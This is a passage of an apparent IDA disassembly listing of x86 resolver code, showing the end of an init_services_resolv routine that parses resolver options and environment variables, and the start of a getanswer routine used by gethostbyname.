mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFCh jnz short loc_804B0CC push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B0CC cmp byte ptr [ebx+2], 0 jz short loc_804B0BA movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B0CC loc_804B0BA: ; CODE XREF: init_services_resolv+6D0j mov dword_8078518, 1 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B0CC: ; CODE XREF: init_services_resolv+6B6j ; init_services_resolv+6CAj ... mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFBh jnz short loc_804B118 push 3 push offset aOff ; "off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B118 cmp byte ptr [ebx+3], 0 jz short loc_804B107 movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B118 loc_804B107: ; CODE XREF: init_services_resolv+71Dj mov dword_8078518, 0 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B118: ; CODE XREF: init_services_resolv+703j ; init_services_resolv+717j ... push offset aAlert ; "alert" jmp loc_804B261 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B124: ; CODE XREF: init_services_resolv+66Cj ; init_services_resolv+68Bj ... push offset aAlert ; "alert" jmp loc_804B395 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B130: ; CODE XREF: init_services_resolv+62Ej ; init_services_resolv+64Ej push 7 push offset aReorder ; "reorder" mov eax, [ebp+var_410] push eax call checkbuf mov edx, eax add esp, 0Ch test edx, edx jnz loc_804B2C8 cmp [ebp+var_3F9], 0 jz short loc_804B170 movzx edx, [ebp+var_3F9] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz loc_804B2C8 loc_804B170: ; CODE XREF: init_services_resolv+77Fj push offset asc_806791B ; " \t" mov ecx, [ebp+var_410] push ecx call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz loc_804B2BC cmp byte ptr [ebx], 0 jz short loc_804B1B2 mov edx, dword_8078FA0 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804B19C: ; CODE XREF: init_services_resolv+7D8j movzx eax, byte ptr [ebx] test byte ptr [edx+eax*2+1], 20h jz short loc_804B1B2 inc ebx jz loc_804B2BC cmp byte ptr [ebx], 0 jnz short loc_804B19C loc_804B1B2: ; CODE XREF: init_services_resolv+7B9j ; init_services_resolv+7CCj test ebx, ebx jz loc_804B2BC cmp byte ptr [ebx], 0 jz loc_804B2BC mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFCh jnz short loc_804B210 push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B210 cmp byte ptr [ebx+2], 0 jz short loc_804B1FE movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B210 loc_804B1FE: ; CODE XREF: init_services_resolv+814j mov dword_807851C, 1 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B210: ; CODE XREF: init_services_resolv+7FAj ; init_services_resolv+80Ej ... mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFBh jnz short loc_804B25C push 3 push offset aOff ; "off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B25C cmp byte ptr [ebx+3], 0 jz short loc_804B24B movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B25C loc_804B24B: ; CODE XREF: init_services_resolv+861j mov dword_807851C, 0 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B25C: ; CODE XREF: init_services_resolv+847j ; init_services_resolv+85Bj ... push offset aReorder ; "reorder" loc_804B261: ; CODE XREF: init_services_resolv+4BDj ; init_services_resolv+601j ... mov ecx, [ebp+var_40C] push ecx push offset aResolvSSComman ; "resolv+: %s: \"%s\" command incorrectly f"... push 0Ch push 0Bh mov eax, dword_8078F9C push eax call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf push ebx push offset aResolvSIsAnInv ; "resolv+: \"%s\" is an invalid keyword\n" push 0Dh push 0Bh mov ecx, dword_8078F9C push ecx call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf add esp, 1Ch jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B2BC: ; CODE XREF: init_services_resolv+7B0j ; init_services_resolv+7CFj ... push offset aReorder ; "reorder" jmp loc_804B395 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B2C8: ; CODE XREF: init_services_resolv+772j ; init_services_resolv+792j push 4 push offset aTrim ; "trim" mov eax, [ebp+var_410] push eax call checkbuf mov edx, eax add esp, 0Ch test edx, edx jnz loc_804B3CC cmp [ebp+var_3FC], 0 jz short loc_804B308 movzx edx, [ebp+var_3FC] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz loc_804B3CC loc_804B308: ; CODE XREF: init_services_resolv+917j cmp dword_8078520, 3 jg loc_804AA5C push offset asc_806791B ; " \t" mov ecx, [ebp+var_410] push ecx call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804B390 jmp short loc_804B335 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B334: ; CODE XREF: init_services_resolv+960j ; init_services_resolv+965j inc ebx loc_804B335: ; CODE XREF: init_services_resolv+957j cmp byte ptr [ebx], 20h jz short loc_804B334 cmp byte ptr [ebx], 9 jz short loc_804B334 cmp byte ptr [ebx], 0 jz short loc_804B390 push ebx mov eax, [ebp+var_408] push eax call strcpy mov eax, [ebp+var_408] mov ecx, dword_8078520 mov ds:dword_807A348[ecx*4], eax inc dword_8078520 mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx mov [ebp+var_414], edx add [ebp+var_408], edx add esp, 8 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B390: ; CODE XREF: init_services_resolv+955j ; init_services_resolv+96Aj push offset aTrim ; "trim" loc_804B395: ; CODE XREF: init_services_resolv+4C9j ; init_services_resolv+60Dj ... mov eax, [ebp+var_40C] push eax push offset aResolvSSComman ; "resolv+: %s: \"%s\" command incorrectly f"... push 0Ch push 0Bh mov ecx, dword_8078F9C push ecx loc_804B3AC: ; CODE XREF: init_services_resolv+19Ej call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf add esp, 10h jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B3CC: ; CODE XREF: init_services_resolv+90Aj ; init_services_resolv+92Aj push offset asc_806791B ; " \t" mov eax, [ebp+var_410] push eax call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804B3E9 mov byte ptr [ebx], 0 loc_804B3E9: ; CODE XREF: init_services_resolv+A0Cj mov ecx, [ebp+var_410] push ecx push offset aResolvSIsAnInv ; "resolv+: \"%s\" is an invalid keyword\n" push 0Dh push 0Bh mov eax, dword_8078F9C push eax call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf add esp, 0Ch jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B41C: ; CODE XREF: init_services_resolv+A3j mov ds:dword_8079DD4[esi*4], 0 mov ecx, [ebp+var_404] push ecx call fclose add esp, 4 loc_804B436: ; CODE XREF: init_services_resolv+70j push offset aResolv_serv_or ; "RESOLV_SERV_ORDER" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz loc_804B542 xor esi, esi push offset asc_8067950 ; " ,;:" push ebx call strtok mov ebx, eax add esp, 8 test ebx, ebx jz loc_804B542 nop loc_804B468: ; CODE XREF: init_services_resolv+B59j push 4 push offset aBind ; "bind" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B4B0 cmp byte ptr [ebx+4], 0 jz short loc_804B492 movzx edx, byte ptr [ebx+4] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B4B0 loc_804B492: ; CODE XREF: init_services_resolv+AA8j mov ds:dword_8079DD4[esi*4], 1 inc esi test byte ptr dword_807854C, 1 jnz short loc_804B51E call res_init jmp short loc_804B51E ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B4B0: ; CODE XREF: init_services_resolv+AA2j ; init_services_resolv+AB8j push 5 push offset aHosts ; "hosts" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B4E8 cmp byte ptr [ebx+5], 0 jz short loc_804B4DA movzx edx, byte ptr [ebx+5] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B4E8 loc_804B4DA: ; CODE XREF: init_services_resolv+AF0j mov ds:dword_8079DD4[esi*4], 2 jmp short loc_804B51D ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804B4E8: ; CODE XREF: init_services_resolv+AEAj ; init_services_resolv+B00j push 3 push offset aNis ; "nis" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B51E cmp byte ptr [ebx+3], 0 jz short loc_804B512 movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B51E loc_804B512: ; CODE XREF: init_services_resolv+B28j mov ds:dword_8079DD4[esi*4], 3 loc_804B51D: ; CODE XREF: init_services_resolv+B0Dj inc esi loc_804B51E: ; CODE XREF: init_services_resolv+ACDj ; init_services_resolv+AD4j ... push offset asc_8067950 ; " ,;:" push 0 call strtok mov ebx, eax add esp, 8 test ebx, ebx jnz loc_804B468 mov ds:dword_8079DD4[esi*4], 0 loc_804B542: ; CODE XREF: init_services_resolv+A6Fj ; init_services_resolv+A89j push offset aResolv_spoof_c ; "RESOLV_SPOOF_CHECK" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz loc_804B626 push 4 push offset aWarn ; "warn" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B59C cmp byte ptr [ebx+4], 0 jz short loc_804B583 movzx edx, byte ptr [ebx+4] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B59C loc_804B583: ; CODE XREF: init_services_resolv+B99j mov dword_8078514, 1 mov dword_8078518, 1 jmp loc_804B626 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B59C: ; CODE XREF: init_services_resolv+B93j ; init_services_resolv+BA9j push 3 push offset aOff ; "off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B5DC cmp byte ptr [ebx+3], 0 jz short loc_804B5C6 movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B5DC loc_804B5C6: ; CODE XREF: init_services_resolv+BDCj mov dword_8078514, 0 mov dword_8078518, 0 jmp short loc_804B626 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B5DC: ; CODE XREF: init_services_resolv+BD6j ; init_services_resolv+BECj push 8 push offset aWarnOff ; "warn off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B61C cmp byte ptr [ebx+8], 0 jz short loc_804B606 movzx edx, byte ptr [ebx+8] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B61C loc_804B606: ; CODE XREF: init_services_resolv+C1Cj mov dword_8078514, 1 mov dword_8078518, 0 jmp short loc_804B626 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B61C: ; CODE XREF: init_services_resolv+C16j ; init_services_resolv+C2Cj mov dword_8078514, 1 loc_804B626: ; CODE XREF: init_services_resolv+B7Bj ; init_services_resolv+BBFj ... push offset aResolv_multi ; "RESOLV_MULTI" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz short loc_804B67A push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B670 cmp byte ptr [ebx+2], 0 jz short loc_804B663 movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B670 loc_804B663: ; CODE XREF: init_services_resolv+C79j mov dword_8078510, 1 jmp short loc_804B67A ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804B670: ; CODE XREF: init_services_resolv+C73j ; init_services_resolv+C89j mov dword_8078510, 0 loc_804B67A: ; CODE XREF: init_services_resolv+C5Fj ; init_services_resolv+C95j push offset aResolv_reorder ; "RESOLV_REORDER" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz short loc_804B6CE push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B6C4 cmp byte ptr [ebx+2], 0 jz short loc_804B6B7 movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B6C4 loc_804B6B7: ; CODE XREF: init_services_resolv+CCDj mov dword_807851C, 1 jmp short loc_804B6CE ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804B6C4: ; CODE XREF: init_services_resolv+CC7j ; init_services_resolv+CDDj mov dword_807851C, 0 loc_804B6CE: ; CODE XREF: init_services_resolv+CB3j ; init_services_resolv+CE9j push offset aResolv_add_tri ; "RESOLV_ADD_TRIM_DOMAINS" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz short loc_804B74F push offset asc_8067950 ; " ,;:" push ebx jmp short loc_804B741 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B6EC: ; CODE XREF: init_services_resolv+D75j cmp dword_8078520, 3 jg short loc_804B73A push ebx mov eax, [ebp+var_408] push eax call strcpy mov eax, [ebp+var_408] mov ecx, dword_8078520 mov ds:dword_807A348[ecx*4], eax inc dword_8078520 mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx mov [ebp+var_414], edx add [ebp+var_408], edx add esp, 8 loc_804B73A: ; CODE XREF: init_services_resolv+D1Bj push offset asc_8067950 ; " ,;:" push 0 loc_804B741: ; CODE XREF: init_services_resolv+D0Fj call strtok mov ebx, eax add esp, 8 test ebx, ebx jnz short loc_804B6EC loc_804B74F: ; CODE XREF: init_services_resolv+D07j push offset aResolv_overrid ; "RESOLV_OVERRIDE_TRIM_DOMAINS" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz loc_804B7E7 mov dword_8078520, 0 mov [ebp+var_408], offset unk_807A358 push offset asc_8067950 ; " ,;:" push ebx jmp short loc_804B7D9 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B784: ; CODE XREF: init_services_resolv+E0Dj cmp dword_8078520, 3 jg short loc_804B7D2 push ebx mov eax, [ebp+var_408] push eax call strcpy mov eax, [ebp+var_408] mov ecx, dword_8078520 mov ds:dword_807A348[ecx*4], eax inc dword_8078520 mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx mov [ebp+var_414], edx add [ebp+var_408], edx add esp, 8 loc_804B7D2: ; CODE XREF: init_services_resolv+DB3j push offset asc_8067950 ; " ,;:" push 0 loc_804B7D9: ; CODE XREF: init_services_resolv+DA8j call strtok mov ebx, eax add esp, 8 test ebx, ebx jnz short loc_804B784 loc_804B7E7: ; CODE XREF: init_services_resolv+D88j mov dword_80784F8, 1 lea esp, [ebp+var_420] pop ebx pop esi pop edi mov esp, ebp pop ebp retn init_services_resolv endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden getanswer proc near ; CODE XREF: gethostbyname+180p ; gethostbyaddr+105p var_144 = byte ptr -144h var_138 = dword ptr -138h var_130 = dword ptr -130h var_12C = dword ptr -12Ch var_128 = dword ptr -128h var_124 = dword ptr -124h var_120 = dword ptr -120h var_11C = dword ptr -11Ch var_118 = dword ptr -118h var_114 = dword ptr -114h var_110 = dword ptr -110h var_10C = dword ptr -10Ch var_108 = dword ptr -108h var_104 = byte ptr -104h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp sub esp, 138h push edi push esi push ebx mov [ebp+var_12C], 0 mov eax, [ebp+arg_8] mov [ebp+var_130], eax mov ds:dword_8079E74, 0 mov edx, [ebp+arg_0] add edx, [ebp+arg_4] mov [ebp+var_108], edx mov eax, [ebp+arg_0] mov ax, [eax+6] xchg al, ah movzx edx, ax mov [ebp+var_120], edx mov eax, [ebp+arg_0] mov ax, [eax+4] xchg al, ah mov [ebp+var_10C], offset unk_8079F14 mov [ebp+var_11C], 401h mov esi, [ebp+arg_0] add esi, 0Ch cmp ax, 1 jz short loc_804B880 mov ds:dword_807E788, 3 jmp loc_804BE9E ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804B880: ; CODE XREF: getanswer+6Ej mov edx, [ebp+var_11C] push edx mov eax, [ebp+var_10C] push eax push esi mov edx, [ebp+var_108] push edx mov eax, [ebp+arg_0] push eax call sub_804D02C mov ebx, eax add esp, 14h test ebx, ebx jge short loc_804B8B8 mov ds:dword_807E788, 3 jmp loc_804BE9E ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804B8B8: ; CODE XREF: getanswer+A6j call sub_805E954 lea esi, [esi+ebx+4] cmp [ebp+arg_10], 1 jnz short loc_804B8FF xor cl, cl mov edi, [ebp+var_10C] mov al, cl cld mov ecx, 0FFFFFFFFh repne scasb mov ebx, ecx not ebx mov edx, [ebp+var_10C] mov ds:dword_8079E74, edx add edx, ebx mov [ebp+var_10C], edx sub [ebp+var_11C], ebx mov eax, ds:dword_8079E74 mov [ebp+arg_8], eax loc_804B8FF: ; CODE XREF: getanswer+C5j mov [ebp+var_110], offset dword_8079E88 mov ds:dword_8079E88, 0 mov ds:dword_8079E78, offset dword_8079E88 mov [ebp+var_114], offset dword_8079DE4 mov ds:dword_8079DE4, 0 mov ds:dword_8079E84, offset dword_8079DE4 mov [ebp+var_124], 0 mov [ebp+var_128], 0 mov eax, [ebp+var_120] dec [ebp+var_120] test eax, eax jle loc_804BE14 cmp [ebp+var_108], esi jbe loc_804BE14 nop loc_804B970: ; CODE XREF: getanswer+60Ej mov edx, [ebp+var_11C] push edx mov eax, [ebp+var_10C] push eax push esi mov edx, [ebp+var